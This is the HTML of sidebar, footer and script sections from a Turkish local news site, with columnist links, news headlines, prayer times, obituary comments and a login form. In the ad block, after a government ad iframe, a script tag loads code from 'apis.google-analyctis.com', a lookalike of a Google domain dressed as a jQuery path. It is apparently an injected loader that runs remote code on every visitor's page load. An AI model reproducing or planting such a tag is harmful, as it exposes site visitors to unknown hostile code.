            <a href="https://www.elbistaninsesi.com/dirilis-dusuncesinin-mimari-sezai-karakoc-hakk-a-yurudu-makale,6388.html" title="Diriliş düşüncesinin mimarı Sezai Karakoç Hakk&#039;a yürüdü" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/6faefd20-9b1e-418c-b102-3b2d1b2c5463.jpg" alt="Adnan YILMAZ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/88/adnan-yilmaz" title="Adnan YILMAZ">Adnan YILMAZ</a></h4>
              <a href="https://www.elbistaninsesi.com/dirilis-dusuncesinin-mimari-sezai-karakoc-hakk-a-yurudu-makale,6388.html" title="Diriliş düşüncesinin mimarı Sezai Karakoç Hakk&#039;a yürüdü" >Diriliş düşüncesinin mimarı Sezai Karakoç Hakk&#039;a yürüdü</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/cennet-senin-ozunde-gizli-makale,6374.html" title="CEN­NET SENİN ÖZÜN­DE GİZLİ" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/ceritli.jpg" alt="Celal Ceritli">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/95/celal-ceritli" title="Celal Ceritli">Celal Ceritli</a></h4>
              <a href="https://www.elbistaninsesi.com/cennet-senin-ozunde-gizli-makale,6374.html" title="CEN­NET SENİN ÖZÜN­DE GİZLİ" >CEN­NET SENİN ÖZÜN­DE GİZLİ</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/dogu-turkistan-dvasi-ve-mill-siyaset-makale,6373.html" title="DOĞU TÜRKİSTAN DÂVASI ve MİLLÎ SİYASET" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/dr-mustafa-kok_1.jpg" alt="Dr. Mustafa KÖK">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/8/dr-mustafa-kok" title="Dr. Mustafa KÖK">Dr. Mustafa KÖK</a></h4>
              <a href="https://www.elbistaninsesi.com/dogu-turkistan-dvasi-ve-mill-siyaset-makale,6373.html" title="DOĞU TÜRKİSTAN DÂVASI ve MİLLÎ SİYASET" >DOĞU TÜRKİSTAN DÂVASI ve MİLLÎ SİYASET</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/elbistan-bestepe-koyu-makale,6366.html" title="   ELBİSTAN BEŞTEPE KÖYÜ;" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/034421b8-4158-4551-83a7-c308f4156fe9.jpg" alt="Orhan SAYDAM">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/89/orhan-saydam" title="Orhan SAYDAM">Orhan SAYDAM</a></h4>
              <a href="https://www.elbistaninsesi.com/elbistan-bestepe-koyu-makale,6366.html" title="   ELBİSTAN BEŞTEPE KÖYÜ;" >   ELBİSTAN BEŞTEPE KÖYÜ;</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/katledilen-tum-kadinlarimizin-anisina-makale,6365.html" title="Katledilen tüm kadınlarımızın anısına…" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Makale.jpg" alt="Meltem Göçer">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/53/meltem-gocer" title="Meltem Göçer">Meltem Göçer</a></h4>
              <a href="https://www.elbistaninsesi.com/katledilen-tum-kadinlarimizin-anisina-makale,6365.html" title="Katledilen tüm kadınlarımızın anısına…" >Katledilen tüm kadınlarımızın anısına…</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/recete-makale,6360.html" title="RE­ÇE­TE" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/Can-Ugur_919_1.jpg" alt="Can Uğur">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/17/can-ugur" title="Can Uğur">Can Uğur</a></h4>
              <a href="https://www.elbistaninsesi.com/recete-makale,6360.html" title="RE­ÇE­TE" >RE­ÇE­TE</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/kim-demis-makale,6348.html" title="KİM DEMİŞ" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/11.jpg" alt="Nusret Yılmaz Külekçi">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/74/nusret-yilmaz-kulekci" title="Nusret Yılmaz Külekçi">Nusret Yılmaz Külekçi</a></h4>
              <a href="https://www.elbistaninsesi.com/kim-demis-makale,6348.html" title="KİM DEMİŞ" >KİM DEMİŞ</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="https://www.elbistaninsesi.com/tutarsiz-ve-kisiligi-iplige-donenler-makale,6334.html" title="Tutarsız ve Kişiliği İpliğe Dönenler" >
            <div class="hs-yazar-resim pull-right">
                <img src="https://www.elbistaninsesi.com/images/yazarlar/thumbs/mikail_Yahin_foto.jpeg" alt="Mikail Şahin">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="https://www.elbistaninsesi.com/profil/65/mikail-sahin" title="Mikail Şahin">Mikail Şahin</a></h4>
              <a href="https://www.elbistaninsesi.com/tutarsiz-ve-kisiligi-iplige-donenler-makale,6334.html" title="Tutarsız ve Kişiliği İpliğe Dönenler" >Tutarsız ve Kişiliği İpliğe Dönenler</a>
            </div>
          </a>
          </div>
              </div>
    </div>
  </div>

  
  <!-- SON DAKIKA VE OZEL HABER -->
  <div class="sonozeltab">

    <ul class="nav nav-tabs" id="sonozel">
      <li class="active"><a href="#sondakika" data-toggle="tab" class="sondakika">Son Dakika</a></li>      <li class=""><a href="#ozelhaber" data-toggle="tab" class="ozelhaber">Özel Haber</a></li>    </ul>

    <div class="tab-content">

            <div class="tab-pane active" id="sondakika">
        <ul class="unstyled hs-liste add-last">
          
          <li><a href="https://www.elbistaninsesi.com/vefatlar/edibe-odacioglu-87-yasinda-h71859.html" title="Edibe Odacıoğlu 87 yaşında" >Edibe Odacıoğlu 87 yaşında</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/guncel/polisten-motosiklet-suruculerine-hayat-kurtaracak-hediye-h71612.html" title="Polisten motosiklet sürücülerine hayat kurtaracak hediye" >Polisten motosiklet sürücülerine hayat kurtaracak hediye</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/guncel/kiraz-agaci-ekim-ayinda-cicek-acti-h71428.html" title="Kiraz ağacı ekim ayında çiçek açtı" >Kiraz ağacı ekim ayında çiçek açtı</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/guncel/daha-temiz-bir-nurhak-icin-7den-70e-bir-araya-geldiler-h70967.html" title="Daha temiz bir Nurhak için 7’den 70’e bir araya geldiler" >Daha temiz bir Nurhak için 7’den 70’e bir araya geldiler</a></li>
          
          <li class="last"><a href="https://www.elbistaninsesi.com/guncel/terbuzekteki-kirmizi-benekli-alabalik-olumleri-vatandasi-endiselendiriyor-h70711.html" title="Terbüzek’teki kırmızı benekli alabalık ölümleri vatandaşı endişelendiriyor" >Terbüzek’teki kırmızı benekli alabalık ölümleri vatandaşı endişelendiriyor</a></li>
                  </ul>
      </div>
      
            <div class="tab-pane" id="ozelhaber">
        <ul class="unstyled hs-liste add-last">
          
          <li><a href="https://www.elbistaninsesi.com/ekonomi/yapalak-santralinin-gelecegini-migemin-gorusu-belirleyecek-h37268.html" title="Yapalak santralinin geleceğini, MİGEMin görüşü belirleyecek" >Yapalak santralinin geleceğini, MİGEM’in görüşü belirleyecek</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/vefatlar/durmus-ali-yavuz-80-yasinda-h37225.html" title="Durmuş Ali Yavuz 80 yaşında" >Durmuş Ali Yavuz 80 yaşında</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/ekonomi/pancardaki-polar-orani-mahkemelik-oldu-h37167.html" title="Pancardaki polar oranı, mahkemelik oldu" >Pancardaki polar oranı, mahkemelik oldu</a></li>
          
          <li><a href="https://www.elbistaninsesi.com/guncel/boyle-saka-gorulmedi-h34847.html" title="Böyle şaka görülmedi!" >Böyle şaka görülmedi!</a></li>
          
          <li class="last"><a href="https://www.elbistaninsesi.com/guncel/eshab-i-kehf-kulliyesine-konaklama-tesisi-h34004.html" title="Eshab-ı Kehf Külliyesine konaklama tesisi" >Eshab-ı Kehf Külliyesi’ne konaklama tesisi</a></li>
                  </ul>
      </div>
      
    </div>
  </div>
  
<!-- NAMAZ VAKITLERI -->
  <div class="namazvakitleri">
    <div class="title">
      <h5>Namaz Vakitleri</h5>
      <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right">
                <option value="adana" >Adana</option>
                <option value="adiyaman" >Adıyaman</option>
                <option value="afyon" >Afyon</option>
                <option value="agri" >Ağrı</option>
                <option value="aksaray" >Aksaray</option>
                <option value="amasya" >Amasya</option>
                <option value="ankara" >Ankara</option>
                <option value="antalya" >Antalya</option>
                <option value="ardahan" >Ardahan</option>
                <option value="artvin" >Artvin</option>
                <option value="aydin" >Aydın</option>
                <option value="balikesir" >Balıkesir</option>
                <option value="bartin" >Bartın</option>
                <option value="batman" >Batman</option>
                <option value="bayburt" >Bayburt</option>
                <option value="bilecik" >Bilecik</option>
                <option value="bingol" >Bingöl</option>
                <option value="bitlis" >Bitlis</option>
                <option value="bolu" >Bolu</option>
                <option value="burdur" >Burdur</option>
                <option value="bursa" >Bursa</option>
                <option value="canakkale" >Çanakkale</option>
                <option value="cankiri" >Çankırı</option>
                <option value="corum" >Çorum</option>
                <option value="denizli" >Denizli</option>
                <option value="diyarbakir" >Diyarbakır</option>
                <option value="duzce" >Düzce</option>
                <option value="edirne" >Edirne</option>
                <option value="elazig" >Elazığ</option>
                <option value="erzincan" >Erzincan</option>
                <option value="erzurum" >Erzurum</option>
                <option value="eskisehir" >Eskişehir</option>
                <option value="gaziantep" >Gaziantep</option>
                <option value="giresun" >Giresun</option>
                <option value="gumushane" >Gümüşhane</option>
                <option value="hakkari" >Hakkari</option>
                <option value="hatay" >Hatay</option>
                <option value="igdir" >Iğdır</option>
                <option value="isparta" >Isparta</option>
                <option value="istanbul" >İstanbul</option>
                <option value="izmir" >İzmir</option>
                <option value="kahramanmaras" selected>Kahramanmaraş</option>
                <option value="karabuk" >Karabük</option>
                <option value="karaman" >Karaman</option>
                <option value="kars" >Kars</option>
                <option value="kastamonu" >Kastamonu</option>
                <option value="kayseri" >Kayseri</option>
                <option value="kirikkale" >Kırıkkale</option>
                <option value="kirklareli" >Kırklareli</option>
                <option value="kirsehir" >Kırşehir</option>
                <option value="kilis" >Kilis</option>
                <option value="izmit" >Kocaeli</option>
                <option value="konya" >Konya</option>
                <option value="kutahya" >Kütahya</option>
                <option value="malatya" >Malatya</option>
                <option value="manisa" >Manisa</option>
                <option value="mardin" >Mardin</option>
                <option value="mersin" >Mersin</option>
                <option value="mugla" >Muğla</option>
                <option value="mus" >Muş</option>
                <option value="nevsehir" >Nevşehir</option>
                <option value="nigde" >Niğde</option>
                <option value="ordu" >Ordu</option>
                <option value="osmaniye" >Osmaniye</option>
                <option value="rize" >Rize</option>
                <option value="adapazari" >Sakarya</option>
                <option value="samsun" >Samsun</option>
                <option value="siirt" >Siirt</option>
                <option value="sinop" >Sinop</option>
                <option value="sivas" >Sivas</option>
                <option value="sanliurfa" >Şanlıurfa</option>
                <option value="sirnak" >Şırnak</option>
                <option value="tekirdag" >Tekirdağ</option>
                <option value="tokat" >Tokat</option>
                <option value="trabzon" >Trabzon</option>
                <option value="tunceli" >Tunceli</option>
                <option value="usak" >Uşak</option>
                <option value="van" >Van</option>
                <option value="yalova" >Yalova</option>
                <option value="yozgat" >Yozgat</option>
                <option value="zonguldak" >Zonguldak</option>
              </select>
    </div>
      <div class="sonuc">

      <table cellspacing="0" cellpadding="0" id="vakitler">
          <tr>
            <th>İmsak</th>
            <th>Güneş</th>
            <th>Öğle</th>
            <th>İkindi</th>
            <th>Akşam</th>
            <th>Yatsı</th>
          </tr>
          <tr>
            <td>06:12</td>
            <td>07:39</td>
            <td>12:38</td>
            <td>15:07</td>
            <td>17:28</td>
            <td>18:49</td>
          </tr>
      </table>


      </div>

  </div>

  <div class="reklam reklam208"><iframe name=BIKADV src="https://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe>
<script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div>
  <!-- SON YORUMLAR -->
  <div class="son-yorumlar">
    <div class="header">
      <h5>Son Yorumlar</h5>
    </div>
    <div class="content">
      <ul class="unstyled hs-liste add-last">
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/safiye-sahin-86-yasinda-h72317.html#comment_368174" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/feruz-sahin-h72299.html#comment_368173" title="" >Merhuma Allah&#39;tan Rahmet, yakınlarına...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/bekir-kok-65-yasinda-h72300.html#comment_368172" title="" >Merhuma Allah&#39;tan Rahmet, yakınlarına...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/kemal-kinili-63-yasinda-h72301.html#comment_368171" title="" >Merhuma Allah&#39;tan Rahmet, yakınlarına...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/muzaffer-halac-10-yasinda-h72311.html#comment_368170" title="" >Merhuma Allah&#39;tan Rahmet, yakınlarına...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/nuriye-salan-h72312.html#comment_368169" title="" >Merhum Nuriye teyzemize Allah&#39;tan Rahmet,...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/ramazan-ozcan-83-yasinda-h72319.html#comment_368168" title="" >Allah rahmet eylesin mekanı cennet olsun</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mediha-yeniceri-90-yasinda-h72314.html#comment_368167" title="" >Merhumeye Allah&#39;tan Rahmet, yakınlarına...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/safiye-sahin-86-yasinda-h72317.html#comment_368166" title="" >Merhumeye Allah&#39;tan Rahmet, yakınlarına...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/ramazan-ozcan-83-yasinda-h72319.html#comment_368165" title="" >Merhuma Allah&#39;tan Rahmet, yakınlarına...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mediha-yeniceri-90-yasinda-h72314.html#comment_368164" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mediha-yeniceri-90-yasinda-h72314.html#comment_368162" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/nuriye-salan-h72312.html#comment_368161" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/ramazan-ozcan-83-yasinda-h72319.html#comment_368160" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/ramazan-ozcan-83-yasinda-h72319.html#comment_368159" title="" >Allah rahmet etsin mekanı cennet olsun...</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/anma-hakki-taskin-h72240.html#comment_368158" title="" >ALLAH RAHMET EYLESİN</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mediha-yeniceri-90-yasinda-h72314.html#comment_368157" title="" >Allah rahmet eylesin mekani cennet olsun....</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/mediha-yeniceri-90-yasinda-h72314.html#comment_368156" title="" >Mediha yengeye Allah’tan rahmet diliyorum....</a></li>
                <li><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/ramazan-ozcan-83-yasinda-h72319.html#comment_368155" title="" >ALLAH RAHMET EYLESİN MEKANI CENNET OLSUN</a></li>
                <li class="last"><i class="icon-chevron-right"></i> <a href="https://www.elbistaninsesi.com/vefatlar/ramazan-ozcan-83-yasinda-h72319.html#comment_368154" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li>
              </ul>
    </div>
  </div>

  
<!-- ARSIV -->
<div class="arsiv">
  <div class="header">
    <h5>Arşiv</h5>
  </div>
  <div class="content">
    <form action="https://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" >
      <select name="gun" class="day span1">
                <option value="01" >01</option>
                <option value="02" >02</option>
                <option value="03" >03</option>
                <option value="04" >04</option>
                <option value="05" >05</option>
                <option value="06" >06</option>
                <option value="07" >07</option>
                <option value="08" >08</option>
                <option value="09" >09</option>
                <option value="10" >10</option>
                <option value="11" >11</option>
                <option value="12" >12</option>
                <option value="13" >13</option>
                <option value="14" >14</option>
                <option value="15" >15</option>
                <option value="16" >16</option>
                <option value="17" >17</option>
                <option value="18" >18</option>
                <option value="19" >19</option>
                <option value="20" >20</option>
                <option value="21" >21</option>
                <option value="22" >22</option>
                <option value="23" >23</option>
                <option value="24" >24</option>
                <option value="25" >25</option>
                <option value="26" >26</option>
                <option value="27" selected>27</option>
                <option value="28" >28</option>
                <option value="29" >29</option>
                <option value="30" >30</option>
                <option value="31" >31</option>
              </select>
      <select name="ay" class="month span1">
                <option value="01" >Ocak</option>
                <option value="02" >Şubat</option>
                <option value="03" >Mart</option>
                <option value="04" >Nisan</option>
                <option value="05" >Mayıs</option>
                <option value="06" >Haziran</option>
                <option value="07" >Temmuz</option>
                <option value="08" >Ağustos</option>
                <option value="09" >Eylül</option>
                <option value="10" >Ekim</option>
                <option value="11" >Kasım</option>
                <option value="12" selected>Aralık</option>
              </select>
      <select name="yil" class="year span1">
                <option value="2021" selected>2021</option>
                <option value="2020" >2020</option>
                <option value="2019" >2019</option>
                <option value="2018" >2018</option>
                <option value="2017" >2017</option>
              </select>
      <button type="submit" class="btn btn-default span1 pull-right">Ara</button>
    </form>
  </div>
</div>


  


        </div>
        
      </div>

        
                <!-- Sol Dikey Reklam -->
        <div class="reklam dikey sol" style="width:px;height:px;">

                                                                                                                                                                            </div>
        
        <!-- Sağ Dikey Reklam -->
        <div class="reklam dikey sag ortala" style="width:px;height:px;">

                                                                <p style="width:160px;"><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- kaynarca -->
<ins class="adsbygoogle"
 style="display:block"
 data-ad-client="ca-pub-3633419220222736"
 data-ad-slot="5807534991"
 data-ad-format="auto"
 data-full-width-responsive="true"></ins>
<script>
 (adsbygoogle = window.adsbygoogle || []).push({});
</script></p>
              
                                                                                                                                                                                                      </div>

        
      </div>

      <!-- FOOTER -->
<div id="siteFooter" class="footer">

      <div class="row-fluid">
      <div class="container center">
        <div class="span4">
          <div>Copyright © 2021 - Tüm hakları saklıdır.<br>Elbistanın Sesi</div>
          <div class="footer-social">
            <a href="https://facebook.com/elbistaninsesi" rel="nofollow"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/facebook_circle-32.png" alt="FACEBOOK"></a>
            <a href="https://twitter.com/elbistaninsesi" rel="nofollow"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/twitter_circle-32.png" alt="TWITTER"></a>
            <a href="https://www.elbistaninsesi.com/rss"><img src="https://www.elbistaninsesi.com/_themes/hs-rush-php/images/rss_circle-32.png" alt="RSS"></a>
          </div>
        </div>
        <div class="span4 text-center">
          <div class="footer-logo"><a href="https://www.elbistaninsesi.com/" class="logo"><img src="https://www.elbistaninsesi.com/images/banner/Ysimsiz-1_1.jpg" alt="Hastaneye ‘pansuman’ gibi atama" /></a></div>
        </div>
        <div class="span4">
          <p>&lt;center&gt;

0 (344) 415 04 15 &lt;br&gt;
<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="41242d23283235202f282f3224322826203b243524322801262c20282d6f222e2c">[email&#160;protected]</a>
&lt;br&gt;Kızılcaoba Mah. Kışla Cad. 19/1&lt;/center&gt;

    </p>          <p><span class="site-info glyphicons earphone" style="padding-left: 0;"></span> 0 (344) 415 04 15</p>        </div>
      </div>
      </div>

      <div id="footer-alt" class="row-fluid">

        <div class="container center">

        <div class="span3">
          <div class="footer-alt-link"><a href="https://www.elbistaninsesi.com/m/" class="footer-alt-mobil glyphicons iphone"><strong>Mobil</strong>Mobil siteyi görüntüleyin.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="https://www.elbistaninsesi.com/kunye.html" class="footer-alt-reklam glyphicons global"><strong>Künye</strong>Künyeyi görüntüleyin.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="https://www.elbistaninsesi.com/iletisim.html" class="footer-alt-iletisim glyphicons headset"><strong>İletişim</strong>Bize ulaşın.</a></div>
        </div>
        <div class="span3">
          <div class="footer-alt-link"><a href="https://www.elbistaninsesi.com/sitene-ekle.html" class="footer-alt-iletisim glyphicons embed_close"><strong>Sitene Ekle</strong>Güncel haberleri ekleyin.</a></div>
        </div>

        </div>
      </div>



      <div class="row-fluid">
      <div class="container center">
        <div class="span12 text-center">
          <p>Bu sitede yayınlanan tüm materyalin her hakkı mahfuzdur. Kaynak gösterilse bile gazetemizin izni olmadan yayınlanamaz.</p>         <a href="https://www.tebilisim.com/" target="_blank" title="haber sistemi, haber scripti, haber yazılımı, tebilişim"><p>Yazılım: TE Bilişim</p></a> 
        </div>
      </div>
      </div>

  <div id="top" class="btn btn-inverse">Yukarı Çık</div>
</div>
      <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script>
var facebook_paylasim_secret_token, facebook_paylasim_app_id;
facebook_paylasim_app_id = "";
facebook_paylasim_secret_token = "";
if (location.href.match(/\?.*/) && document.referrer) {
   location.href = location.href.replace(/\?.*/, '');
}
</script>
<div id="uye" class="user modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
  <div class="modal-header">
    <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>
    <h3 id="myModalLabel">Üye Girişi</h3>
  </div>
  <div class="modal-body">
<form class="form-horizontal" action="https://www.elbistaninsesi.com/index.php?m=login&amp;rd=https%3A%2F%2Fwww.elbistaninsesi.com%2Fguncel%2Fhastaneye-pansuman-gibi-atama-h72326.html" method="post">
  <div class="control-group">
    <label class="control-label" for="inputName">Kullanıcı Adı</label>
    <div class="controls">
      <input id="inputName" value="" name="kullanici" type="text"  placeholder="Kullanıcı Adı" required>
    </div>
  </div>
  <div class="control-group">
    <label class="control-label" for="inputPassword">Şifre</label>
    <div class="controls">
      <input type="password" value="" name="sifre" id="inputPassword" placeholder="Şifre" required>
    </div>
  </div>
  <div class="control-group">
    <div class="controls">
      <button type="submit" class="btn hs-sdch btn-info">Giriş Yap</button>
    </div>
  </div>
</form>
  </div>
  <div class="modal-footer">
    <a href="https://www.elbistaninsesi.com/uyelik.html" class="pull-left btn">Üye Ol</a>
    <a href="https://www.elbistaninsesi.com/unuttum.html" class="pull-left btn">Şifremi unuttum?</a>
    <button class="btn hs-sdch btn-danger" data-dismiss="modal" aria-hidden="true">Kapat</button>
  </div>
</div>




<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery-1.9.1.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/modernizr.custom.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/classie.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/uisearch.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/login.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.showbizpro.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cookie.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.mousewheel.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.scrollbar.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.cycle.all.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/base.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/waypoints.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/sticky.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/comments.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/jquery.pKisalt.min.js"></script><script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/hs-paylas.min.js"></script><script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/moment-tr.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/system.min.js"></script>
<script src="https://www.elbistaninsesi.com/_themes/hs-rush-php/js/text.js"></script>
<script type="text/javascript">

	new UISearch( document.getElementById( 'sb-search' ) );

	$(function(){
							});

		$("#comment_list .text").pKisalt();
	
		var gsTitle = document.querySelectorAll(".gs-title")[0].innerHTML,
	gsSpace   = ' ',
	gsUrl   = location.href;
	$("#paylas").jsSocials({
		url: location.href,
		text: gsTitle,
		showCount: true,
		showLabel: false,
		shares: [
			{ share: "twitter", via: "elbistaninsesi", hashtags: "Elbistanın Sesi" },
            { share: "whatsapp", text: "Bunu bilmelisin!"},
            "facebook",
            "linkedin",
            "pinterest",
			]
		});
							$('#haber > .page-header').waypoint(function(direction) {
		  $('#article-finished').toggleClass('hiding', direction === "up");
		}, {
		  offset: function() {
		    return $.waypoints('viewportHeight') - $(this).height() - 750;
		  }
		});
			var hasBeenClicked = false;
	var kisa_site_adi = "Elbistanın Sesi";
	var kopyala_imza_onu = "Kaynak: http://www.elbistaninsesi.com";

	$(document).on('copy', function(e){
		if ($(e.target).closest("#yorumlar,textarea,input").length) {
			hasBeenClicked = true;
		} else {
			hasBeenClicked = false;
		}
	  var sel = window.getSelection();
	  var copyFooter = "<br><br>" + kopyala_imza_onu + "<a href='"+document.location.href+"'>"+document.location.href+"</a><br><br>" + kisa_site_adi;
	  var copyHolder = $('<div>', {html: sel+copyFooter, style: {position: 'absolute', left: '-99999px'}});
	  if (!hasBeenClicked){
	  	$('body').append(copyHolder);
	  	sel.selectAllChildren( copyHolder[0] );
	  	window.setTimeout(function() {
	      copyHolder.remove();
	  	},0);
	 }
	});
		
	
	
	
	
	


		tebilisim('72326', 'haber', '');
	
</script>

    	    
	
	
    
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-21655627-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-21655627-1');
</script>
<!-- End Google Analytics -->



  </body>
</html>
